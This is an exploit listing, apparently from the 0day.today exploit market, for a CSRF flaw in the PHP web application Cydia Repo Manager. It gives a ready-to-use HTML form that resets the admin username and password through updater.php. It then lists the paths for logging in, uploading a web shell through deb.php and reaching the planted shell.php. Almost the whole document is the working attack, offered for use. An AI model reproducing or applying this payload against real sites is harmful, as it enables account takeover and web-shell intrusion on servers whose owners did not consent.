[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Cydia Repo Manager CSRF Vulnerability

Author
Ramdan Yantu
Risk
[
Security Risk Low
]
0day-ID
0day-ID-20189
Category
web applications
Date add
17-01-2013
Platform
php
Proof of concept:
 
<form method="post" action="http://bastardlabs/[CydiaRepoManager_path]/debs/updater.php">
<input type="text" name="user" value="Username"/> <br />
<input type="text" name="pass" value="Password"/><br />
<input type="submit" name="s" value="w00tw00t!" />
</form>
 
 
Login :  http://bastardlabs/[CydiaRepoManager_path]/index.php
 
Upload Shell : http://bastardlabs/[CydiaRepoManager_path]/deb.php
 
Shell : http://bastardlabs/[CydiaRepoManager_path]/downloads/shell.php
 
 
Demo :
http://bastardlabs.info/demo/CydiaRepoManager1.png
http://bastardlabs.info/demo/CydiaRepoManager2.png
http://bastardlabs.info/demo/CydiaRepoManager3.png

#  0day.today [2024-11-15]  #